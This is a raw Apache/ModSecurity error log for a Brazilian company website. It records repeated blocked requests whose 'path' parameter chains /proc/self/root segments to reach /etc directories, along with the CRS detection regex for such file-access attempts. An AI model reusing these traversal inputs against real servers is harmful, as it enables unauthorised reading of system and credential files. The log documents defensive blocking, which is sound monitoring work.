[Fri Mar 20 07:18:32.819220 2026] [:error] [pid 7235:tid 140411649607424] [client 74.7.243.128:41118] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0e-PqxLDW4GITHUkTdjQAAAQs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 07:19:14.101369 2026] [:error] [pid 26799:tid 140411607643904] [client 74.7.243.128:41790] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0fIta6ubjKNq_cu4bLvwAAA1A"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 07:19:34.325288 2026] [:error] [pid 15826:tid 140411616036608] [client 74.7.243.128:39284] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0fNuoXxyEfFpUF8f941gAAAU8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 07:19:47.002086 2026] [mime_magic:error] [pid 9818:tid 140411691570944] (70014)End of file found: [client 216.73.216.191:50886] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 07:21:11.227659 2026] [:error] [pid 21219:tid 140411557287680] [client 74.7.243.128:50542] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0fl_XLqtnMIWvjpaKSIwAAApY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 07:21:16.380551 2026] [mime_magic:error] [pid 26799:tid 140411691570944] (70014)End of file found: [client 57.141.18.65:54818] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 07:21:21.075181 2026] [:error] [pid 10189:tid 140411616036608] [client 74.7.243.128:49394] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0foTJ3M9BSuKP7CAYSiQAAAI8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 07:21:28.263804 2026] [:error] [pid 21219:tid 140411582465792] [client 74.7.243.128:47410] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0fqPXLqtnMIWvjpaKSPgAAApM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 07:21:36.768509 2026] [:error] [pid 15826:tid 140411649607424] [client 74.7.243.128:57394] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0fsOoXxyEfFpUF8f95PQAAAUs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 07:21:40.068325 2026] [mime_magic:error] [pid 21219:tid 140411590858496] (70014)End of file found: [client 216.73.216.191:55802] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 07:21:40.327036 2026] [:error] [pid 9818:tid 140411649607424] [client 74.7.243.128:57404] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0ftF1pVZ5mVmJwsFMn_gAAAEs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 07:21:48.799979 2026] [:error] [pid 26799:tid 140411674785536] [client 74.7.243.128:43082] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0fvNa6ubjKNq_cu4bMYAAAA0g"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 07:21:50.151496 2026] [:error] [pid 26799:tid 140411699963648] [client 74.7.243.128:57874] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0fvta6ubjKNq_cu4bMZgAAA0U"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 07:22:11.689776 2026] [mime_magic:error] [pid 7235:tid 140411632822016] (70014)End of file found: [client 216.73.216.191:57560] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 07:22:13.733982 2026] [mime_magic:error] [pid 11167:tid 140411725141760] (70014)End of file found: [client 74.7.243.128:57888] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/bin
[Fri Mar 20 07:22:15.597805 2026] [mime_magic:error] [pid 15826:tid 140411574073088] (70014)End of file found: [client 57.141.18.94:57842] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 07:22:15.617808 2026] [mime_magic:error] [pid 11642:tid 140411548894976] (70014)End of file found: [client 216.73.216.191:57844] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 07:22:59.208527 2026] [:error] [pid 11642:tid 140411582465792] [client 74.7.243.128:42560] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0gA7ninkcc-iUj5ApXOAAAA5M"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 07:23:02.774514 2026] [:error] [pid 9818:tid 140411632822016] [client 74.7.243.128:46162] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0gBl1pVZ5mVmJwsFMoXQAAAE0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 07:23:08.630659 2026] [:error] [pid 7893:tid 140411708356352] [client 74.7.243.128:46168] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0gCxCii7xarUs8iHZf4gAAAgQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 07:23:09.069790 2026] [mime_magic:error] [pid 26799:tid 140411641214720] (70014)End of file found: [client 57.141.18.62:59544] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 07:23:20.243500 2026] [:error] [pid 15826:tid 140411641214720] [client 74.7.243.128:40818] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0gGOoXxyEfFpUF8f950wAAAUw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 07:23:33.219149 2026] [mime_magic:error] [pid 7893:tid 140411548894976] (70014)End of file found: [client 57.141.18.42:60924] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 07:23:34.103419 2026] [:error] [pid 31215:tid 140411649607424] [client 74.7.243.128:45084] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0gJgF0L0L-SsrnPo5gsgAAAss"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 07:23:40.534430 2026] [:error] [pid 9818:tid 140411540502272] [client 74.7.243.128:45096] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0gLF1pVZ5mVmJwsFMoewAAAFg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 07:23:57.493783 2026] [:error] [pid 7893:tid 140411683178240] [client 74.7.243.128:58856] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0gPRCii7xarUs8iHZgIAAAAgc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 07:24:02.195822 2026] [mime_magic:error] [pid 9818:tid 140411649607424] (70014)End of file found: [client 57.141.18.95:33790] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 07:24:02.313798 2026] [mime_magic:error] [pid 11642:tid 140411582465792] (70014)End of file found: [client 57.141.18.5:33794] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 07:24:29.835645 2026] [:error] [pid 7235:tid 140411540502272] [client 74.7.243.128:46200] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0gXfqxLDW4GITHUkTfDQAAARg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 07:24:31.104061 2026] [:error] [pid 7893:tid 140411649607424] [client 74.7.243.128:55390] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/profile.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0gXxCii7xarUs8iHZgNgAAAgs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 07:24:32.117874 2026] [mime_magic:error] [pid 7235:tid 140411632822016] (70014)End of file found: [client 74.7.241.31:57836] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/sys/kernel
